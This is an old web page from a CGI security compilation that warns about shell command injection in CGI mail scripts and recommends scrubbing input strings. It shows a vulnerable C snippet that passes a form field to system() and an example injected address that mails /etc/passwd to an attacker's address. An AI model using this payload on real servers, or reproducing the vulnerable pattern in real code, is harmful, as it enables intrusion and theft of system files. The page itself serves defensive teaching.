[Image]

CGI programs provide a powerful mechanism for enhancing the quality and
usefulness of your Web page. They also open the door for hackers to exploit
your script to do their dirty work.

The biggest danger with CGI programs, is letting a string sent from the
browser be interpreted by a Unix shell on the server. This can happen quite
innocently. Most people code CGI mail programs that put the delivery address
on the form as an argument. This seems simple enough, but then most people
right their CGI mail program as:

     sprintf(buf, "/usr/sbin/Mail %s", to_on_form);
     system(buf);

Those 2 lines of code are disasterous. Suppose instead of "frank@foo.com", I
send the address "frank@foo.com;/usr/sbin/Mail bad_guy@bad_place.com
</etc/passwd". Your program has just sent a normal message to frank, AND
sent our password file to the hacker. (Note: Our password file is only
marginally useful to a hacker, but I don't want them to have it all the
same).

This can be avoided by scrubbing all strings that are going to be sent
through the Unix shell. For C programs scrubString can be used to clean up
strings for safe use with the shell. For Perl programmers there is a Perl
version of scrubString. If you are using other languages, please review the
algorithms here and incorporate them into your programs.

----------------------------------------------------------------------------

Last updated February 97 by Markus Hübner.
Copyright (c) 1994-1996 The Sphere Information Services, Inc. All Rights
Reserved.

                      Back to CGI Security Compilation